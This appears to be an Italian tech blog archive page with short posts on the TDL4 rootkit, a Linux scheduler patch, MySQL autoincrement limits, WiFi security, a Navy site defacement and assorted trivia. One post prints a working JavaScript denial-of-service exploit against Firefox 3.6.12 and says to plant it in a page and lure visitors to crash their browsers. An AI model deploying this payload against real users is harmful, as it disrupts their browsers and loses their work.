Autore: Luigi Rosa

  • Rootkit che bypassa la protezione della firma digitale dei driver Windows

    TDL4 è la nuova versione di una famiglia di rootkit già noti che abbassa le difese di Windows a 64 bit contro il caricamento nel kernel di driver non firmati.

    La prima parte del malware si annida nel MBR e modifica in memoria il parametro del kernel LoadIntegrityCheckPolicy e fa in modo che vengano accettati anche i driver non firmati in maniera digitale.

    Questo permette al kernel di caricare una versione modificata di kdcom.dll, un componente del debugger del kernel. Le funzioni modificate dal malware esportate dalla DLL bloccano di fatto molti tentativi di debugging del rootkit.

    Se la parte del rootkit caricata nel MBR non entrasse in azione, la DLL sostituita provocherebbe un errore tipo *** Windows is unable to verify the signature of the file \Windows\system32\kdcom.dll. Ma l’abbassamento del livello di sicurezza forza il kernel a non effettuare alcuna verifica.

    A questo punto la porta è aperta per il caricamento di qualsiasi altra schifezza nel kernel. (via Threat Post)

  • 200 righe di patch che fanno la differenza

    Linux è abbastanza consolidato nell’ambiente server, ma deve ancora crescere come kernel adatto ad un utilizzo interattivo al di fuori degli smanettoni.

    Negli ultimi mesi sono state proposte molte patch al kernel per migliorare la risposta interattiva del sistema.

    Mike Galbraith ha proposto una patch basata su un’idea di Linus Torvalds che sembrerebbe fare davvero la differenza. Lo stesso Linus ha commentato «Good job. Group scheduling goes from “useful for some specific server loads” to “that’s a killer feature”.»

    La patch introduce 224 nuove righe di codice e ne toglie 9, ma il risultato sembra essere incredibile: la latenza dello scheduler cala di 10 volte nei momenti di picco d di 60 volte con un carico medio. Il risultato è un’esperienza di utilizzo più fluida e veloce. (via Phoronix)

    Aggiornamento 19/11/2010 08:00 – È possibile modificare il kernel per avere un’anteprima della patch.

  • Istruzioni per l’uso IKEA

    Se le istruzioni per alcuni aspetti della vita fossero scritte da IKEA?

    CollegeHumor ha fatto alcuni esempi.

  • Id autoincrementale delle tabelle MySQL

    Tabella giri-velocità / RPM-speed tablePremetto che sono un fan sfegatato degli id interi autoincrementali delle tabelle SQL usati come chiave primaria. Prima o poi tornano utili e fanno comunque comodo.

    Un collega qualche giorno fa mi ha detto di essere un po’ perplesso degli id autoincrementali per via del rischio di overflow.

    MySQL, infatti, in caso di raggiungimento del limite del contatore autoincrementale non permette di aggiungere ulteriori record. Non è una bella situazione. Mi sono deciso, quindi, a fare un paio di conti.

    Ipotizziamo un id autoincrementale di tipo UNSIGNED INT: abbiamo 4 byte di dati, pari a 32 bit pari a 4.294.967.295 in base decimale. Ipotizzando l’inserimento in una tabella di un milione di record al giorno (11 record al secondo) avremmo 4.295 giorni (poco meno di 12 anni) di vita della nostra tabella. Decisamente inaccettabile.

    Meglio utilizzare un id autoincrementale di tipo UNSIGNED BIGINT: 8 byte, 64 bit e 18.446.744.073.709.551.615 possibili valori. Se ipotizziamo un miliardo di record al giorno (11.500 al secondo) potremmo avere spazio di crescita per circa 25 milioni di anni. Potrebbe essere sufficiente.

  • 0day di Mozilla Firefox 3.6.12

    <!--
    
    0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service
    
    Credits:
    Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
    Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
    Alessandro 'scox' Scoscia	<scox@backtrack.it>
    
    -->
    
    <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
    
    <script>
    var i=0;
    for (i=0;i<=19999;i++)
    {
    document.write("a");
    }
    
    for (i=0;i<=3;i++)
    {
    document.write(document.body.innerHTML);
    }
    
    </script>
    

    Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

    Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

    Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

    Il problema è stato scoperto dal gruppo italiano Backtrack.

  • Un computer Apple a più di 200.000€

    È il prezzo che Christie’s stima per il prezzo d’asta della scheda di sistema numero 82 del primo modello di computer Apple, A.D. 1976.

    Completano il lotto all’asta una cassetta con l’interprete BASIC, la documentazione con il primo logo della società che ritraeva Sir Isaac Newton sotto il leggendario albero di mele e altre chicche storiche relative al prodotto.

  • La toppa peggio del buco

    Molti programmatori o professionisti dei computer sono dei pessimi dattilografi.

    Io per primo. Prima o poi fonderò un movimento per sostituire che con ceh, ma sto divagando.

    Damn You Auto Correct! è un sito che raccoglie (in inglese) le situazioni in cui uno spellcheck automatico non è proprio una buona idea (ricordate Word che metteva sempre in maiuscolo l’articolo plurale i?).

  • Fattore umano

    Improve a mechanical device and you may double productivity. But improve man, you gain a thousandfold. (Khan Noonien Singh, Space Seed)

    Ieri mattina l’elettricista del cliente dov’ero dice a me e ad un collega «Sentite, potete dire voi al giardiniere che non è una bella idea tenere la tanica di benzina del tagliaerba sopra al quadro generale [della corrente]? Quando glielo dico io mi risponde che per lui è comodo metterlo lì».

    Tre ore dopo un suo aiutante torna in ufficio per collegare l’UPS nuovo (una cosina da 10 kVA), una cosa che sarebbe dovuta durare un paio di minuti, tempo di collegare sei fili. Dopo 15 minuti era ancora lì con la faccia a punto interrogativo. Io e un collega ci avviciniamo e chiediamo se ci sono problemi. Per farla breve: dietro l’UPS c’è una chiave che abilita o disabilita il BYPASS. La chiave era su ON perché lui pensava che per accendere l’UPS tutto andasse su “ON”.

    Quanto sopra non per dire che l’utente non capisce niente, ma per ricordare quanto sia utile investire sulle persone perché, alla fine, sono loro che fanno la differenza.

  • Proteggere i WiFi liberi con una password nota

    Il rilascio di Firesheep ha evidenziato un problema noto delle connessioni WiFi senza password: i dati non vengono trasmessi in modo criptato.

    Chester Wisniewski, senior security advisor di Sophos, propone una soluzione elementare, che consiste nell’utilizzare il protocollo WPA2 con una password nota e unica per tutti: free.

    Un piccolo aggiornamento nel software dei client WiFi potrebbe fare in modo che il client provi quella password prima ancora di chiederla all’utente.

    In questo caso la password non serve ad impedire la connessione a chi non ha titolo per farlo, ma forza il protocollo a negoziare una chiave di cifratura univoca con ciascun terminale collegato, rendendo di fatto inutile un tool come Firesheep.

    Aggiornamento 17/2/2011 – Un aggiornamento della pagina di Naked Security linkata sopra rivela che questa soluzione non è percorribile e non deve essere utilizzata. Grazie a Paolo Attivissimo per avermi segnalato l’aggiornamento.

  • TRON

    [youtube=http://www.youtube.com/watch?v=d4RiUy23e9s&w=480]

    È stato, probabilmente assieme a Wargames, un cult dei primi fan della tecnologia informatica degli anni ’80.

    Non è più impossibile ricreare nello spettatore l’impatto visuale del film originale perché oramai la tecnologia delle immagini digitali è preponderante in questo tipo di produzioni e il metodo di produzione del TRON originale aveva poche scene digitali e moltissime elaborate un analogico con una tecnica usata, probabilmente, una sola volta.

    Però chi ha visto TRON al cinema e ha ancora un po’ di sense of wonder non credo riesca a rimanere del tutto indifferente davanti a queste immagini.

  • Vi ricorda qualcosa?

    Vi ricorda qualcosa questa immagine?

    La foto è stata scattata sulla Terra o su Coruscant?

    Qui c’è la risposta.

  • Nessuno è immune

    Il sito della Marina Militare britannica è stato hackerato, a fianco la riproduzione dell’immagine che ha sostituito il sito.

    In questo momento il sito con la sola immagine sta girando su in Internet Information Server 6.0.

    L’autore dell’azione sembra essere TinKode, non nuovo a questo tipo di attacchi verso siti con alta visibilità.

    L’attacco sembra aver avuto l’unico scopo di rivelare un problema. TinKode, infatti, si è limitato a rivelare le credenziali di amministratore del sito, senza impiantare del codice dannoso come è successo, per esempio, con il sito del premio Nobel per la pace. (altro…)